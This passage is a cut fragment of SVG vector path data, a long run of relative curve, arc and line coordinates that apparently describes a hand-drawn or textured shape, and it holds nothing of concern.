5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,